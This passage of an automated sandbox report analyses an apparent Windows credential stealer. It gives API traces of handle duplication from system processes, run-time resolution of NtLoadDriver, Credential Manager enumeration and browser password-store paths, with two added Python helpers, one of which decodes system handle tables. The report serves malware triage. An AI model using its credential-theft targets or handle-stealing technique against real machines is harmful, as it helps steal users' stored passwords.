                                                  					_t22 = 0;
                                                  				} else {
                                                  					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                  					 *_t22 = 0;
                                                  					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                  					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                  					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                  				}
                                                  				_push(0x14);
                                                  				 *((intOrPtr*)(_t31 + 8)) = _t22;
                                                  				L004115D0();   // third sub-object, stored at this+0xc
                                                  				if(_t22 == 0) {
                                                  					_t22 = 0;
                                                  				} else {
                                                  					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                  					 *_t22 = 0;
                                                  					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                  					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                  					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                  				}
                                                  				_push(0x14);
                                                  				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
                                                  				L004115D0();   // fourth sub-object, stored at this+0x10
                                                  				if(_t22 == 0) {
                                                  					_t22 = 0;
                                                  				} else {
                                                  					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                  					 *_t22 = 0;
                                                  					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                  					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                  					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                  				}
                                                  				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
                                                  				return _t31;   // returns this
                                                  			}

                                                  Instruction addresses: 0x004084ce to 0x00408571

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  • API String ID: 1860491036-0
                                                  • Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                  • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
                                                  • Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                  • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			// Appends the C string _a4 to a string pool and records the string's offset in an
                                                  			// index array, returning the index of the new entry. Fields as used here: +0x4 bytes
                                                  			// of pool in use, +0x10 pool buffer, +0x1c entries in use, +0xc index array (4-byte
                                                  			// offsets). E004060FA (malloc/memcpy/free in the subcalls listed below) is called to
                                                  			// make room, receiving +0x14 and +0x18 alongside the new sizes, which is consistent
                                                  			// with those being the capacities. The comparisons against 0xffffffff and the
                                                  			// otherwise undeclared _t25/_t53 are as the decompiler emitted them.
                                                  			E00406A74(void* __eax, void* __ecx, char* _a4) {
                                                  				int _v8;
                                                  				void* __edi;
                                                  				intOrPtr _t25;
                                                  				int _t27;
                                                  				intOrPtr _t28;
                                                  				intOrPtr _t31;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t52;
                                                  				intOrPtr _t53;
                                                  				void** _t55;
                                                  				void** _t56;
                                                  				void* _t59;
                                                  
                                                  				_t59 = __eax;                                  // this
                                                  				_t27 = strlen(_a4);
                                                  				_t42 =  *((intOrPtr*)(_t59 + 4));              // current pool length = offset of the new string
                                                  				_t52 = _t42 + _t27 + 1;                        // new pool length, including the terminator
                                                  				_v8 = _t27;
                                                  				_t28 =  *((intOrPtr*)(_t59 + 0x14));
                                                  				 *((intOrPtr*)(_t59 + 4)) = _t52;
                                                  				_t55 = _t59 + 0x10;                            // &pool buffer
                                                  				if(_t52 != 0xffffffff) {
                                                  					E004060FA(_t59, _t52, _t55, 1, _t28);          // grow pool (element size 1)
                                                  				} else {
                                                  					free( *_t55);
                                                  				}
                                                  				_t53 =  *(_t59 + 0x1c);                        // current entry count
                                                  				_t31 =  *((intOrPtr*)(_t59 + 0x18));
                                                  				_t56 = _t59 + 0xc;                             // &index array
                                                  				if( *(_t59 + 0x1c) != 0xffffffff) {
                                                  					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);      // grow index array (element size 4)
                                                  				} else {
                                                  					free( *_t56);
                                                  				}
                                                  				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);      // copy string into the pool at its offset
                                                  				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0; // NUL terminate
                                                  				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42; // index[count] = offset
                                                  				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
                                                  				_t25 =  *(_t59 + 0x1c) - 1; // -1
                                                  				return _t25;                                   // index of the appended string
                                                  			}

                                                  Instruction addresses: 0x00406a7e to 0x00406b0c

                                                  APIs
                                                  • strlen.MSVCRT ref: 00406A80
                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                    • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                    • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                    • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,74B04DE0,00406B49,00000001,?,00000000,74B04DE0,00406D88,00000000,?,?), ref: 00406137
                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                  • memcpy.MSVCRT ref: 00406AE3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$memcpy$mallocstrlen
                                                  • String ID:
                                                  • API String ID: 3669619086-0
                                                  • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                  • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                  • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                  • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  APIs
                                                  • memset.MSVCRT ref: 0040885E
                                                    • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885
                                                    • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                    • Part of subcall function 0040FC89: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31
                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 004088C6
                                                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA
                                                  • _wcsicmp.MSVCRT ref: 0040898B
                                                  • _wcsicmp.MSVCRT ref: 0040899E
                                                  • _wcsicmp.MSVCRT ref: 004089B1
                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,000000FF,00000000,00000104), ref: 004089C5
                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00408A0B
                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00408A1A
                                                  • memset.MSVCRT ref: 00408A38
                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00408A6B
                                                  • _wcsicmp.MSVCRT ref: 00408A8B
                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 00408ACB
                                                  • FreeLibrary.KERNELBASE(?,?,?,000000FF,00000000,00000104), ref: 00408AED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindFreeInformationLibraryNameNotificationOpenQuerySystem
                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                  • API String ID: 1954110673-3398334509
                                                  • Opcode ID: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
                                                  • Instruction ID: ac6d74245de41f4a68afaf46936feeb9e4215e23a81ac82868d75cf9687b4f7b
                                                  • Opcode Fuzzy Hash: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
                                                  • Instruction Fuzzy Hash: FB9115B1D00209AFDB10EF95C985AAEBBB5FF04305F60447FE949B6291DB399E40CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
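The trace above shows the sequence NtQuerySystemInformation(0x10 = SystemHandleInformation, 0x1000-byte buffer), _wcsicmp against dllhost.exe / taskhost.exe / taskhostex.exe, OpenProcess(0x40 = PROCESS_DUP_HANDLE) and DuplicateHandle, but not what the code does with the buffer between those calls. The following is an added example (not code from the report or from the sample) that decodes such a buffer and filters it by process id, the step that has to happen before a handle can be duplicated. The 16-byte entry layout is the publicly known x86 layout of the undocumented SYSTEM_HANDLE_TABLE_ENTRY_INFO structure, which fits this 32-bit sample; the sample buffer and its object type indices are constructed for the test and carry no meaning beyond it.

```python
"""Decode a SystemHandleInformation buffer (added example, not the sample's code)."""
from __future__ import annotations

import struct
from dataclasses import dataclass

SYSTEM_HANDLE_INFORMATION = 0x10          # SystemInformationClass seen in the trace
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004  # NTSTATUS when the caller's buffer is too small
PROCESS_DUP_HANDLE = 0x40                 # OpenProcess access seen in the trace

# ULONG NumberOfHandles, followed by NumberOfHandles entries of (x86 layout):
#   USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex;
#   UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG GrantedAccess;
ENTRY_FMT = "<HHBBHII"
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)   # 16 bytes


@dataclass(frozen=True)
class HandleEntry:
    pid: int
    object_type: int
    attributes: int
    handle: int
    object_addr: int
    granted_access: int


def parse_handle_table(buf: bytes) -> list[HandleEntry]:
    """Decode the buffer; raise ValueError when it is shorter than its own header claims."""
    if len(buf) < 4:
        raise ValueError("buffer smaller than the NumberOfHandles header")
    (count,) = struct.unpack_from("<I", buf, 0)
    needed = 4 + count * ENTRY_SIZE
    if len(buf) < needed:
        # A caller that starts with a fixed 0x1000-byte buffer, as in the trace, has to
        # retry with a larger one when the kernel returns STATUS_INFO_LENGTH_MISMATCH.
        raise ValueError(f"truncated: need {needed} bytes, have {len(buf)}")
    entries = []
    for i in range(count):
        pid, _backtrace, otype, attrs, handle, obj, access = struct.unpack_from(
            ENTRY_FMT, buf, 4 + i * ENTRY_SIZE)
        entries.append(HandleEntry(pid, otype, attrs, handle, obj, access))
    return entries


def is_truncated(buf: bytes) -> bool:
    """True when parse_handle_table would reject the buffer as too short."""
    try:
        parse_handle_table(buf)
    except ValueError:
        return True
    return False


def handles_for_pids(entries: list[HandleEntry], pids) -> list[HandleEntry]:
    """Entries owned by the given process ids: the selection that precedes
    OpenProcess(PROCESS_DUP_HANDLE) and DuplicateHandle on each HandleValue."""
    wanted = set(pids)
    return [e for e in entries if e.pid in wanted]


def build_sample_buffer(entries: list[HandleEntry]) -> bytes:
    """Serialise entries the way the kernel lays them out (used to build test data)."""
    out = struct.pack("<I", len(entries))
    for e in entries:
        out += struct.pack(ENTRY_FMT, e.pid, 0, e.object_type, e.attributes,
                           e.handle, e.object_addr, e.granted_access)
    return out


# Constructed sample: two handles in pid 1234, one in pid 5678. Type indices are arbitrary.
SAMPLE = build_sample_buffer([
    HandleEntry(1234, 0x1c, 0, 0x4, 0x8a5e3000, 0x120089),
    HandleEntry(1234, 0x07, 0, 0x8, 0x8a5e4000, 0x1fffff),
    HandleEntry(5678, 0x1c, 0, 0xc, 0x8a5e5000, 0x120089),
])

if __name__ == "__main__":
    for e in handles_for_pids(parse_handle_table(SAMPLE), [1234]):
        print(f"pid={e.pid} handle=0x{e.handle:x} type={e.object_type} access=0x{e.granted_access:x}")
```

The length check matters in practice: the handle table of a live system is far larger than 0x1000 bytes, so a first call with that size fails with STATUS_INFO_LENGTH_MISMATCH and the caller must loop, which is why a too-short buffer is rejected rather than partially decoded.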

                                                  APIs
                                                    • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111B6
                                                  • memset.MSVCRT ref: 004111CB
                                                  • Process32FirstW.KERNEL32(?,?), ref: 004111E7
                                                  • OpenProcess.KERNEL32(00000410,00000000,?,00001000,?,00000000), ref: 0041122C
                                                  • memset.MSVCRT ref: 00411253
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00411288
                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004112A2
                                                  • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 004112C3
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 004112F4
                                                  • free.MSVCRT(?), ref: 0041130D
                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00411356
                                                  • CloseHandle.KERNEL32(?,?,0000022C), ref: 00411366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                  • API String ID: 3536422406-1740548384
                                                  • Opcode ID: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                  • Instruction ID: bbba850b15206e26884db202d857e323fd936e243bbe251c85cc099381913945
                                                  • Opcode Fuzzy Hash: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                  • Instruction Fuzzy Hash: 7E51AF72840258ABDB21DF55CC84EDEB7B9EF94304F1001ABFA18E3261DB759A84CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
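Two of the records above resolve their interesting imports at run time rather than through the import table: the subcall at 0040FC89 fetches NtQuerySystemInformation, NtLoadDriver, NtUnloadDriver and the other Nt* routines from ntdll.dll with GetProcAddress, and the Toolhelp routine fetches QueryFullProcessImageNameW from kernel32.dll the same way. Such names never appear in a static import listing, so they are worth pulling out of the API trace directly. The following is an added example (not part of the report) that parses trace lines in this report's "Api.Module(args), ref: addr" layout and pairs each GetProcAddress with the most recent GetModuleHandle/LoadLibrary target; the TRACE text is copied from the lines above, and the pairing is a heuristic, since the trace does not record which module handle was passed.

```python
"""Collect run-time resolved imports from sandbox API-trace lines (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Lines copied from the report above; the bullet and "Part of subcall" prefix are ignored.
TRACE = """\
• Part of subcall function 0040FC89: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
• Part of subcall function 0040FC89: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
• Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
• Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00411288
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004112A2
• Part of subcall function 00409EB8: LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
• Part of subcall function 00409EB8: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
• memset.MSVCRT ref: 0040885E
"""

# Api.Module, an optional parenthesised argument list, then "ref: <8 hex digits>".
LINE_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
# Arguments the trace could not name: 8-digit hex values (possibly negative) or "?".
HEX_OR_UNKNOWN = re.compile(r"^(?:-?[0-9A-Fa-f]{8}|\?)$")

LOADERS = {"GetModuleHandleW", "GetModuleHandleA", "LoadLibraryW", "LoadLibraryA"}


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple[str, ...]
    ref: int


def parse_trace(text: str) -> list[Call]:
    """Turn trace lines into Call records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m["args"]
        args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def resolved_imports(calls: list[Call]) -> list[tuple[str | None, str]]:
    """(dll, function) pairs for every GetProcAddress whose name argument is visible.

    The dll is the first argument of the most recent GetModuleHandle/LoadLibrary call,
    a heuristic: the trace shows call order, not which module handle was passed.
    """
    current_dll = None
    found = []
    for c in calls:
        if c.api in LOADERS and c.args:
            current_dll = c.args[0]
        elif c.api == "GetProcAddress":
            names = [a for a in c.args if not HEX_OR_UNKNOWN.match(a)]
            if names:
                found.append((current_dll, names[-1]))
    return found


if __name__ == "__main__":
    for dll, name in resolved_imports(parse_trace(TRACE)):
        print(f"{dll}!{name}")
```

Run against the full report rather than the excerpt, the same two functions give a list of everything the sample resolves dynamically, which is the list to compare against its static imports when judging what an import-table-only triage would have missed.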

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00410790,?), ref: 00408457
                                                  • FindNextFileW.KERNELBASE(000000FF,0000038B,00000000,?,00410790,?), ref: 00408475
                                                  • wcslen.MSVCRT ref: 004084A5
                                                  • wcslen.MSVCRT ref: 004084AD
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFindwcslen$FirstNext
                                                  • String ID:
                                                  • API String ID: 2163959949-0
                                                  • Opcode ID: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
                                                  • Instruction ID: 6e3c8222864954d55df90d51b8e56744ea09e2897b7152e8bd6019cb1af30d80
                                                  • Opcode Fuzzy Hash: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
                                                  • Instruction Fuzzy Hash: E5118272515706AFD7149B24D984A9B73DCAF04725F604A3FF09AD31C0FF78A9448B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00415EAF: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
                                                    • Part of subcall function 00415EAF: malloc.MSVCRT ref: 00415EE6
                                                    • Part of subcall function 00415EAF: free.MSVCRT(?), ref: 00415EF6
                                                    • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416001
                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416029
                                                  • free.MSVCRT(00000000,?,00000000,?,00000000), ref: 00416032
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                  • String ID:
                                                  • API String ID: 1355100292-0
                                                  • Opcode ID: 6d9bbb2232084d268bbffa8b88e6344bd84b9c6ec403a6433ede71687f16327b
                                                  • Instruction ID: 7d405d749a0edc351a3ddf496a078fe72cac754ac47b8191c628d3d1323914f3
                                                  • Opcode Fuzzy Hash: 6d9bbb2232084d268bbffa8b88e6344bd84b9c6ec403a6433ede71687f16327b
                                                  • Instruction Fuzzy Hash: 45219276804108EEEB21EBA4C8849EF7BBCEF09304F1100ABE641D7141E778CEC597A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004161BB
                                                  • GetSystemInfo.KERNELBASE(00451CE0,?,00000000,00440C34,00000000,?,?,00000003,00000000,00000000), ref: 004161C4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoSystemmemset
                                                  • String ID:
                                                  • API String ID: 3558857096-0
                                                  • Opcode ID: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
                                                  • Instruction ID: 01e0680712ac90f889d23e176cd2934d89dbbab4f1fad96818c53916f6f4ffc6
                                                  • Opcode Fuzzy Hash: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
                                                  • Instruction Fuzzy Hash: D6E02230A0062067E3217732BE07FCF22848F02348F00403BFA00DA366F6AC881506ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004101DA
                                                  • wcsrchr.MSVCRT ref: 004101F2
                                                  • memset.MSVCRT ref: 004102D9
                                                  • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,00000000,00000104), ref: 00410326
                                                    • Part of subcall function 00409A34: _wcslwr.MSVCRT ref: 00409AFC
                                                    • Part of subcall function 00409A34: wcslen.MSVCRT ref: 00409B11
                                                    • Part of subcall function 00408619: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 00408652
                                                    • Part of subcall function 00408619: wcslen.MSVCRT ref: 00408678
                                                    • Part of subcall function 00408619: wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
                                                    • Part of subcall function 00408619: memset.MSVCRT ref: 00408725
                                                    • Part of subcall function 00408619: memcpy.MSVCRT ref: 00408746
                                                    • Part of subcall function 00409EB8: LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
                                                    • Part of subcall function 00409EB8: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
                                                    • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F309
                                                    • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F31E
                                                    • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F333
                                                    • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F348
                                                    • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F35D
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F383
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F394
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3CC
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3DA
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F413
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F421
                                                  • memset.MSVCRT ref: 004103AA
                                                  • memset.MSVCRT ref: 004103C6
                                                  • memset.MSVCRT ref: 004103E2
                                                  • memset.MSVCRT ref: 004104F9
                                                    • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E17
                                                    • Part of subcall function 00406DD9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
                                                    • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E69
                                                    • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E81
                                                    • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E99
                                                    • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406EB1
                                                    • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EBC
                                                    • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406ECA
                                                    • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EF9
                                                    • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406F07
                                                  • wcslen.MSVCRT ref: 00410437
                                                  • wcslen.MSVCRT ref: 00410446
                                                  • wcslen.MSVCRT ref: 0041048B
                                                  • wcslen.MSVCRT ref: 0041049A
                                                  • memset.MSVCRT ref: 00410562
                                                  • memset.MSVCRT ref: 0041057A
                                                  • wcslen.MSVCRT ref: 00410593
                                                  • wcslen.MSVCRT ref: 004105A1
                                                  • wcslen.MSVCRT ref: 004105FC
                                                  • wcslen.MSVCRT ref: 0041060A
                                                  • memset.MSVCRT ref: 0041068A
                                                  • wcslen.MSVCRT ref: 00410699
                                                  • wcslen.MSVCRT ref: 00410720
                                                  • wcslen.MSVCRT ref: 0041072E
                                                  • wcslen.MSVCRT ref: 004106A7
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                    • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083BC
                                                    • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$memset$wcscmp$AddressByteCharCredEnumerateEnvironmentExpandLibraryLoadMultiProcStringsWide_wcslwrmemcpywcscatwcscpywcsncmpwcsrchr
                                                  • String ID: %programfiles%\Sea Monkey$Google\Chrome SxS\User Data$Google\Chrome\User Data$Opera$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$wand.dat
                                                  • API String ID: 3717286792-109336846
                                                  • Opcode ID: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
                                                  • Instruction ID: 5236af18994b30efd903e1d9b734594bd5ee8d83944705dbeea0fe3cf72f0f99
                                                  • Opcode Fuzzy Hash: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
                                                  • Instruction Fuzzy Hash: A0F17771901218ABDB20EB51DD85ADEB378AF04714F5444ABF508A7181E7B8AFC4CF9E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00403926: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
                                                    • Part of subcall function 00403926: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
                                                    • Part of subcall function 00403926: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
                                                    • Part of subcall function 00403926: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996
                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002), ref: 0040E319
                                                  • GetModuleHandleW.KERNEL32(00000000,00411F7E,00000000,?,00000002), ref: 0040E332
                                                  • EnumResourceTypesW.KERNEL32 ref: 0040E339
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E4CB
                                                  • DeleteObject.GDI32(?), ref: 0040E4E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
                                                  • String ID: $/deleteregkey$/savelangfile
                                                  • API String ID: 3591293073-28296030
